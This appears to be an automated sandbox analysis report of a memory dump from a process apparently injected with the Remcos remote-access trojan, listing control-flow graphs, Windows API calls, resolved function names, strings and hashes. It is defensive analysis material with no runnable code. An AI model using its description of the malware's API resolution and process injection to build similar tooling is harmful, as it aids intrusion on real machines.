47788 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47654->47788 47789 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47654->47789 47655->47194 47656->47196 47657->47202 47658->47204 47659->47208 47660->47213 47661->47222 47662->47227 47663->47234 47664->47210 47665->47216 47666->47224 47667->47235 47668->47209 47669->47215 47670->47218 47671->47223 47672->47239 47674->47243 47675->47247 47676->47252 47677->47256 47678->47063 47680->47078 47681->47086 47682->47091 47683->47095 47684->47098 47790 41ada8 104 API calls 47685->47790 47687 41b556 LoadResource LockResource SizeofResource 47686->47687 47688 40f419 47686->47688 47687->47688 47689 43bda0 47688->47689 47694 4461b8 __Getctype 47689->47694 47690 4461f6 47706 44062d 20 API calls __dosmaperr 47690->47706 47692 4461e1 RtlAllocateHeap 47693 4461f4 47692->47693 47692->47694 47693->47513 47694->47690 47694->47692 47705 443001 7 API calls 2 library calls 47694->47705 47697 4020bf 47696->47697 47707 4023ce 47697->47707 47699 4020ca 47711 40250a 47699->47711 47701 4020d9 47701->47516 47703 4020b7 28 API calls 47702->47703 47704 406e27 47703->47704 47704->47523 47705->47694 47706->47693 47708 402428 47707->47708 47709 4023d8 47707->47709 47708->47699 47709->47708 47718 4027a7 11 API calls std::_Deallocate 47709->47718 47712 40251a 47711->47712 47713 402535 47712->47713 47715 402520 47712->47715 47729 4028e8 28 API calls 47713->47729 47719 402569 47715->47719 47717 402533 47717->47701 47718->47708 47730 402888 47719->47730 47721 40257d 47722 402592 47721->47722 47723 4025a7 47721->47723 47735 402a34 22 API calls 47722->47735 47737 4028e8 28 API calls 47723->47737 47726 40259b 47736 4029da 22 API calls 47726->47736 47728 4025a5 47728->47717 47729->47717 47731 402890 47730->47731 47732 402898 47731->47732 47738 402ca3 22 API calls 47731->47738 47732->47721 47735->47726 47736->47728 47737->47728 47740 4020e7 47739->47740 47741 4023ce 11 API calls 47740->47741 
47742 4020f2 47741->47742 47742->47532 47743->47532 47745 41ced2 47744->47745 47746 41cf31 47745->47746 47750 41cee2 47745->47750 47747 41cf4b 47746->47747 47748 41d071 28 API calls 47746->47748 47765 41d1d7 28 API calls 47747->47765 47748->47747 47751 41cf1a 47750->47751 47756 41d071 47750->47756 47764 41d1d7 28 API calls 47751->47764 47752 41cf2d 47752->47532 47755->47541 47758 41d079 47756->47758 47757 41d0ab 47757->47751 47758->47757 47759 41d0af 47758->47759 47762 41d093 47758->47762 47776 402725 22 API calls 47759->47776 47766 41d0e2 47762->47766 47764->47752 47765->47752 47767 41d0ec __EH_prolog 47766->47767 47777 402717 22 API calls 47767->47777 47769 41d0ff 47778 41d1ee 11 API calls 47769->47778 47771 41d125 47772 41d15d 47771->47772 47779 402730 11 API calls 47771->47779 47772->47757 47774 41d144 47780 402712 11 API calls std::_Deallocate 47774->47780 47777->47769 47778->47771 47779->47774 47780->47772 47781->47555 47782->47559 47783->47561 47784->47574 47785->47574 47787->47654 47798 412829 61 API calls 47796->47798 47800 443248 _abort 47799->47800 47801 443396 _abort GetModuleHandleW 47800->47801 47809 443260 47800->47809 47803 443254 47801->47803 47803->47809 47833 4433da GetModuleHandleExW 47803->47833 47804 443306 47822 443346 47804->47822 47808 4432dd 47812 4432f5 47808->47812 47816 444276 _abort 5 API calls 47808->47816 47821 445909 EnterCriticalSection 47809->47821 47810 443323 47825 443355 47810->47825 47811 44334f 47842 4577a9 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 47811->47842 47817 444276 _abort 5 API calls 47812->47817 47816->47812 47817->47804 47818 443268 47818->47804 47818->47808 47841 443ff0 20 API calls _abort 47818->47841 47821->47818 47843 445951 LeaveCriticalSection 47822->47843 47824 44331f 47824->47810 47824->47811 47844 448d49 47825->47844 47828 443383 47831 4433da _abort 8 API calls 47828->47831 47829 443363 GetPEB 47829->47828 47830 443373 GetCurrentProcess TerminateProcess 47829->47830 47830->47828 47832 44338b 
ExitProcess 47831->47832 47834 443404 GetProcAddress 47833->47834 47835 443427 47833->47835 47836 443419 47834->47836 47837 443436 47835->47837 47838 44342d FreeLibrary 47835->47838 47836->47835 47839 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47837->47839 47838->47837 47840 443440 47839->47840 47840->47809 47841->47808 47843->47824 47845 448d64 47844->47845 47846 448d6e 47844->47846 47848 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47845->47848 47847 44854a __dosmaperr 5 API calls 47846->47847 47847->47845 47849 44335f 47848->47849 47849->47828 47849->47829 47850 4458c8 47851 4458d3 47850->47851 47853 4458fc 47851->47853 47854 4458f8 47851->47854 47856 448b04 47851->47856 47863 445920 DeleteCriticalSection 47853->47863 47857 44854a __dosmaperr 5 API calls 47856->47857 47858 448b2b 47857->47858 47859 448b49 InitializeCriticalSectionAndSpinCount 47858->47859 47860 448b34 47858->47860 47859->47860 47861 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 47860->47861 47862 448b60 47861->47862 47862->47851 47863->47854 47864 40165e 47865 401666 47864->47865 47866 401669 47864->47866 47867 4016a8 47866->47867 47869 401696 47866->47869 47868 43455e new 22 API calls 47867->47868 47870 40169c 47868->47870 47871 43455e new 22 API calls 47869->47871 47871->47870

                                                        Control-flow Graph

                                                        APIs
                                                        • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                        • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                        • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                        • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                        • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                        • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                        • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                        • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                        • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                        • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                        • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                        • API String ID: 4236061018-3687161714
                                                        • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                        • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                        • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                        • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG,004461B7,00000003), ref: 00443376
                                                        • TerminateProcess.KERNEL32(00000000), ref: 0044337D
                                                        • ExitProcess.KERNEL32 ref: 0044338F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID: PkGNG
                                                        • API String ID: 1703294689-263838557
                                                        • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                        • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                                        • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                                        • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                        • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                        • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                        • Instruction Fuzzy Hash:

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 87 40ec43-40ec45 80->87 90 40ec47-40ec49 87->90 91 40ec4e-40ec55 87->91 92 40ef2c 90->92 93 40ec57 91->93 94 40ec59-40ec65 call 41b354 91->94 92->49 93->94 103 40ec67-40ec69 94->103 104 40ec6e-40ec72 94->104 98->80 124 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->124 103->104 108 40ecb1-40ecc4 call 401e65 call 401fab 104->108 109 40ec74-40ec7b call 407751 104->109 129 40ecc6 call 407790 108->129 130 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->130 121 40ec87-40ec9a call 401e65 call 401fab 109->121 122 40ec7d-40ec82 call 407773 call 40729b 109->122 121->108 141 40ec9c-40eca2 121->141 122->121 157 40f3e0-40f3ea call 40dd7d call 414f65 124->157 129->130 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 130->177 178 40edbb-40edbf 130->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 202 40ed70-40ed74 call 401e65 177->202 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 233 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->233 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 192 40ee59-40ee7d call 40247c call 434829 182->192 183->192 210 40ee8c 192->210 211 40ee7f-40ee8a call 436f10 192->211 212 40ed79-40edb6 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 202->212 216 40ee8e-40ef03 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 call 434832 call 401e65 call 40b9f8 210->216 211->216 212->178 216->233 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 216->288 286 40f017-40f019 233->286 287 40effc 233->287 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->233 305 40ef2a 288->305 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 305->92 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 356 40f194-40f1a7 call 401e65 call 401fab 347->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->357 368 40f207-40f21a call 401e65 call 401fab 356->368 369 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 368->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 368->380 369->368 400 40f27b 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f322 call 401fab call 41353a 413->416 415->418 416->157 428 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 416->428 418->416 443 40f381-40f386 DeleteFileW 428->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->124 445->124 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                        APIs
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                          • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                          • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                          • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                          • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                        • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                        • API String ID: 2830904901-3701325316
                                                        • Opcode ID: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                        • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                        • Opcode Fuzzy Hash: faaf597f9ba31a578cff63a99c76a37e9239b7d9982a30c10bb73a990bef0fa7
                                                        • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                        Control-flow Graph

                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                                        • SetEvent.KERNEL32(?), ref: 00404E43
                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • closesocket.WS2_32(?), ref: 00404E5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                                        • SetEvent.KERNEL32(?), ref: 00404EA2
                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                                        • SetEvent.KERNEL32(?), ref: 00404EBA
                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                        • SetEvent.KERNEL32(?), ref: 00404ED1
                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                        • String ID: PkGNG
                                                        • API String ID: 3658366068-263838557
                                                        • Opcode ID: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                        • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                        • Opcode Fuzzy Hash: 1684f4f73009feb69d70dfcf302ee3e014c0b3edf4bc9f5cbab22c6bf1399946
                                                        • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 465 44acc9-44ace2 466 44ace4-44acf4 call 4467e6 465->466 467 44acf8-44acfd 465->467 466->467 474 44acf6 466->474 469 44acff-44ad07 467->469 470 44ad0a-44ad2e MultiByteToWideChar 467->470 469->470 472 44ad34-44ad40 470->472 473 44aec1-44aed4 call 43502b 470->473 475 44ad94 472->475 476 44ad42-44ad53 472->476 474->467 478 44ad96-44ad98 475->478 479 44ad55-44ad64 call 457210 476->479 480 44ad72-44ad83 call 4461b8 476->480 482 44aeb6 478->482 483 44ad9e-44adb1 MultiByteToWideChar 478->483 479->482 492 44ad6a-44ad70 479->492 480->482 493 44ad89 480->493 487 44aeb8-44aebf call 435ecd 482->487 483->482 486 44adb7-44adc9 call 448c33 483->486 495 44adce-44add2 486->495 487->473 494 44ad8f-44ad92 492->494 493->494 494->478 495->482 497 44add8-44addf 495->497 498 44ade1-44ade6 497->498 499 44ae19-44ae25 497->499 498->487 500 44adec-44adee 498->500 501 44ae27-44ae38 499->501 502 44ae71 499->502 500->482 505 44adf4-44ae0e call 448c33 500->505 503 44ae53-44ae64 call 4461b8 501->503 504 44ae3a-44ae49 call 457210 501->504 506 44ae73-44ae75 502->506 511 44aeaf-44aeb5 call 435ecd 503->511 519 44ae66 503->519 504->511 517 44ae4b-44ae51 504->517 505->487 520 44ae14 505->520 510 44ae77-44ae90 call 448c33 506->510 506->511 510->511 523 44ae92-44ae99 510->523 511->482 522 44ae6c-44ae6f 517->522 519->522 520->482 522->506 524 44aed5-44aedb 523->524 525 44ae9b-44ae9c 523->525 526 44ae9d-44aead WideCharToMultiByte 524->526 525->526 526->511 527 44aedd-44aee4 call 435ecd 526->527 527->487
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                                        • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                                        • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                        • __freea.LIBCMT ref: 0044AEB0
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • __freea.LIBCMT ref: 0044AEB9
                                                        • __freea.LIBCMT ref: 0044AEDE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                        • String ID: PkGNG$tC
                                                        • API String ID: 3864826663-4196309852
                                                        • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                                        • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                        • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
